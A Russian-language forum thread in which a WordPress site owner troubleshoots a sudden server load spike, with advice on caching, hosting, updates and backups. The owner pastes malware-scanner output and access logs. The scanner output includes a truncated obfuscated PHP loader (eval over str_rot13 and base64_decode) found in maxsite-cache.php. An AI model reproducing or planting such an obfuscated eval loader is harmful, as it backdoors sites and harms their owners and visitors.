помогите с нагрузкой на сервер!

Здравствуйте. Это значит что в тот момент было 70 одновременно работающих процессов веб

сервера apache, этого много, не говоря уже о вирт. хостинге.

Это вообще IPv6 адресс, скорее всего бот. Интересует почему веб сервер прослушивает данный протокол.

По поводу кешера. maxcache страничный, его недостаточно. Установите объектный кеш, хотябы с использованием файлов.

Плагин отвечающий за это называется SJ Object Cache (способ кеширования в настройках выберите File Group Cache)

Далее вам также понадобится плагин, который кеширует запросы в бд. Называется он DB Cache Reloaded, также необходимо поставить его Fix.

А какие к примеру процессы? я вообще не понимаю что такое апач( а чиатть что да как долго и некогда, вот разбираюсь в логах ибо сайт снесут (

а IPv6 адресс как я понял пренадлежит самому хостингу

apache это веб сервер, благодаря которому работает ваш сайт.

Со старта запускается опр. число дочерних процессов, если этого не хватает начинаются запускатся дополнительные,

вот в вашем случае таких аж 70 штук. На вирт. хостинге вы ничего не сможете поделать кроме того, что я описал вам выше

по поводу плагинов кеширования. А так, в идеале необходимо переехать на хороший виртуальный выделенный сервер (VDS)

и развернуть там сайт предварительно проведя установку и грамотную настройку веб сервера nginx для кеширования и раздачи статики + оптимизацию сервера СУБД MySQL.

Ах да, ещё необходимо оптимизировать код движка, саму базу, её структуру и грамотно расставить недостающие индексы в ней.

так на этом хостинге все работало и вдруг вырасло в 6 раз на цп и в 100 раз на базу. причем прирост уникальных поситителей был незначитальным и изминения в структуры сайты небыли внесены

Тогда вариантов несколько - ваш хостер прав и вам действительно залили на сайт какое-то вредоносное ПО.

Второй вариант ещё хуже - вас просто хотят развести на более дорогой тариф, ещё, кстати, переход не предлагали?

Третий вариант тоже, в принципе, не есть хороший. Возможно, вас активно начали "парсить" какие-то боты или же атаковать конкуренты.

А так, мы можем лишь догадываться, выяснить мы истинную причину этого не можем, увы.

Можете заказать у людей аудит безопасности сайта и поиск вирусов, может что-то и найдут.

P.S. - настоятельно рекомендую провести всё что я описал выше, включая оптимизацию всех компонентов вашего проекта.

wordpress и плагины обновлены?

p.s. сделайте бэкап сайта и базы на локальный комп, мало ли. один недобросовестный хостер (ныне нерабочий) с меня денег взял за выдачу бекапа после взлома, у вас возможна такая же ситуация...

нет необновлялись, если WP обновить то боюсь весь сайт поедит и с плагинами также, ибо редактировал некоторые файлы вп, но уже непомню какие

вот и одна из возможных причин нагрузки, проверь ai-bolit"ом сайт, можно еще и каспером на локалке до кучи...

p.s. бекап все же лишним не будет...

Бекапы сделал, каспером проверил и ничего невыявило

через айболит наисало вот это но изменения этих файлов небыло с момента размещения на хостинге

Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт:

/home//public_html/wp-includes/ms-functions.php

e = $current_site->domain; } /** * Check to see whether a user is marked as a |spammer, based on username * * @since MU * @uses get_current_user_id() * @u



/home//public_html/wp-includes/user.php

nvalid_username', __('<strong>ERROR</strong>: Your account has been marked as a |spammer.')); // Is a user's blog marked as spam? if ( !is_super_admin( $us



Найдены сигнатуры javascript вирусов:

/home//public_html/wp-admin/includes/class-pclzip.php

&& $p_header['mtime']) // TBC : bug : this was ignoring time with 0/0/0 |if (1) { // ----- Extract time $v_hour = ($p_header['mtime'] &



Найдены длинные зашифрованные последовательности в PHP или подключение внешних файлов. Подозрение на вредоносный скрипт:

/home//public_html/maxsite-cache.php

<?php $kdd9391e7490="base6\64_decode";$j878723423f5c3ba26da="str_rot�";@|eval($j878723423f5c3ba26da($kdd9391e7490("IHNoYXBndmJhIEIoKXtlcmdoZWEgJ9Ch0LrRg



Предупреждения

Скрипт использует код, который часто используются во вредоносных скриптах:

тут многовато, но все из wp-admin или wp-includ там тоже дату изменения файлов подозрительную необноружил

вот сегодня скинули логи,

вот нашел часто выполняющиеся запросы

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:35 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:33 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:31 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:33 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:34 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:31 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:35 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

это логи access

+ в логах ошибок нашел такое

[Mon Feb 04 21:38:14 2013] [error] [client 2a03:6f00:1::b039:d17b] PHP Warning:  Invalid argument supplied for foreach() in /home//public_html/wp-content/plugins/smli/handler.php on line 86

могло ли это вызвать нагрузку в 100 раз?

да и еще сегодня заметил странную активность с одного айпи неподскажите что может быть это ?

собственно тама еще больше, почти весь сайт